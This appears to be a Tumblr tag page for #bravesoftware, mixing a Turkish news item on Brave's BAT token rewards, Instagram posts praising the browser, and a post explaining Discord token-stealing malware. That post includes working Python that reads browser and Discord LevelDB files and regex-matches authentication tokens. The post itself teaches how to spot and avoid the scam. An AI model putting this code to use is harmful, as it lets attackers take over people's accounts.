#bravesoftware
Explore tagged Tumblr posts
Text
Brave 'in BAT Tokeni Artık Gerçek Dünya Ödülleri İçin Kullanılabilir
Kripto parayla çalışan Brave tarayıcısının arkasındaki kuruluş olan Brave Software, TAP Ağı ile bir ortaklık kurduğunu ve kullanıcıların “gerçek dünya ödülleri” için BAT tokeni kullanmalarını sağladı. Bir duyuruya göre bu ödüller, ağın bir parçası olan 250.000'den fazla marka ile kullanılabilir. Bu markalar, Hotels.com ve Uber gibi seyahat ortaklarını, Starbucks ve Domino’yu içeren yemek markalar. Aynı zamanda Xbox, PlayStation ve Hulu gibi eğlence markalarını ve Amazon, Apple ve Walmart gibi perakende satış markalarını içerir.
Amerika'daki Brave Kullanıcıları
TAP üzerinden ödeme, şimdilik ABD'deki Brave’nin token cüzdanını Uphold ile doğrulayan masaüstü kullanıcıları tarafından kullanılabilir. Kullanıcılar artık Uphold hesaplarını OAuth kullanarak TAP Ağına bağlayabilir ve çeşitli ödeme seçenekleri sunmaları için yetki verebilir. Brave'nin kurucu ortağı ve CEO'su Brendan Eich açıklamasına göre: TAP Network ile olan bu ortaklık, tüketicileri ve markaları saygılı, karşılıklı yarar sağlayan bir şekilde bağlama misyonumuzu desteklemekte ve BAT'ın kullanımını genişleterek genel ekosistemimizin büyümesine katkıda bulunmaktadır.
Genel Kullanıma 6-8 Hafta İçinde Açılacak
Bu işlevsellik yalnızca Brave ’nin Nightly derlemesinde masaüstü için haberin hazırlandığı sırada kullanılabilir. Ancak tarayıcının genel sürümünde "6 ila 8 hafta içinde" kullanılabilir olacak. Erişimi günlük dört milyondan fazla aktif kullanıcı ve aylık 12 milyondan fazla aktif kullanıcı olacaktır. Geçen ay, Brave tarayıcı Wayback Machine'i ölü sayfaları geri getirmek için entegre etti ve kullanıcıların web'de mevcut olmayan sayfaların eski sürümlerini kolayca görmelerini sağladı. Tarayıcı, varsayılan olarak reklamları ve izleyicileri engeller, ancak kullanıcıların BAT ile gizliliğe saygılı reklamlar gördükleri için ödüllendirerek Cesur Ödüller programına katılmalarına izin verir. Read the full article
0 notes
Photo
Love the dashboard for Brave. Shout-out to the team @bravesoftware #brave #bravesoftware #wonkasoft #codeislife #creative #code #computers #newbrowser #development #developer #bestbrowser #startup #startups #hardwork
#development#wonkasoft#code#computers#startup#creative#hardwork#brave#bravesoftware#startups#codeislife#newbrowser#bestbrowser#developer
0 notes
Text
Malicious Packages on Discord (Stealing Discord Tokens)
There has recently been a surge of Discord token-grabbing malware used to compromise accounts. The continued propagation of the malware is driven by the public's susceptibility to the scam. I would like to explain how it works so that fewer individuals may fall for this in the future.
1) Why steal Discord tokens?
There is a large market for premium accounts, and accounts that contain rare badges. Attackers will often target Discord accounts that have purchased Nitro in order to attempt to resell them on an online marketplace such as epicnpc.com or playerup.com
2) How does it work?
The payload is executed as a token-grabber that reads a file location on your computer. These programs are often not caught by antivirus because they do not register themself to be run, don't copy themselves, and do not modify any files. In addition to this, they are often obfuscated by other code such as a simple video game or large amounts of unrelated code.
3) What does the code look like?
The code is pretty straightforward, it looks in a User's AppData folder for tokens stored in common browsers and Discord client's levelDB.
def find_tokens(path): path += '\\Local Storage\\leveldb' tokens = [] for file_name in os.listdir(path): if not file_name.endswith('.log') and not file_name.endswith('.ldb'): continue for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'): for token in re.findall(regex, line): tokens.append(token) return tokens def main(): local = os.getenv('LOCALAPPDATA') roaming = os.getenv('APPDATA') paths = { 'Discord': roaming + '\\Discord', 'Discord Canary': roaming + '\\discordcanary', 'Discord PTB': roaming + '\\discordptb', 'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default', 'Opera': roaming + '\\Opera Software\\Opera Stable', 'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default', 'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' }
A famous version of this code, PirateStealer, steals private data such as login information and credit card info from the discord client.
4) What happens when my account is compromised?
When your account is compromised, the bot will most likely send a message to other individuals in your friend's list that have badges identifying them as valuable targets and attempt to get them to run the same payload that you did by masquerading as a trusted source. After this, your account will be locked down and the attacker will post your discord for sale on one of these sites for a going rate of anywhere from a few hundred dollars do a couple thousand dollars.
5) How to avoid this:
Do not download random files from friends out of the blue. If your friend is asking you to download something, confirm their identity by asking a question only they would know, asking them to contact you through a different means to confirm (voice call, Twitter, etc.) or declining the request entirely. People are always the weakest link in cybersecurity and education is the best method to secure ourselves.
1 note
·
View note
Photo
LTnT - Lifestyle, Travel & Technology Podcast Attention !! Season 2 Episode 24: Apps we use on a daily is now live!! In this episode of the Lifestyle, Travel & Technology podcast, the hosts Alexander & Nikki discuss the applications they use most frequently and also mention the ones they use less frequently. Anything from productivity apps, to-do apps to entertainment apps will be discussed in this technology episode. Tune in to find out what these apps are that they use and perhaps there is one that might help you! Click the link in bio for the full episode! . . . . . #projectsocialremedy #ltnt #ltntpodcast #technology #thirdculturekid #thirdculturekids #halfbrownhalfwhite #filipino #austria #german #micedup #internationalpodcast #international #spotify #spotifypodcast #applepodcasts #buzzsproutpodcasts #buzzsprout #entrepreneur #bitpanda #mjam #bravesoftware #willhaben (at Vienna, Austria) https://www.instagram.com/p/CEJjJ4PHyrO/?igshid=638w7e58il5u
#projectsocialremedy#ltnt#ltntpodcast#technology#thirdculturekid#thirdculturekids#halfbrownhalfwhite#filipino#austria#german#micedup#internationalpodcast#international#spotify#spotifypodcast#applepodcasts#buzzsproutpodcasts#buzzsprout#entrepreneur#bitpanda#mjam#bravesoftware#willhaben
0 notes
Photo
Giving Brave a test run and I have to say I am a new user, this has to be the best UX I never knew the speed is amazing. I am testing on a lot of different sites that I know load very slow and this browser is working flawless. Brave Software Thank you for this very cool browser mind is blown. You guys have to check it out https://brave.com/ #fanboy #newbrowser #bestbrowser #newtool #developer #wonkasoft #devturtle #brave #bravesoftware #development #devtools #design #startups
#development#wonkasoft#startups#brave#devturtle#newtool#fanboy#bravesoftware#design#devtools#newbrowser#bestbrowser#developer
0 notes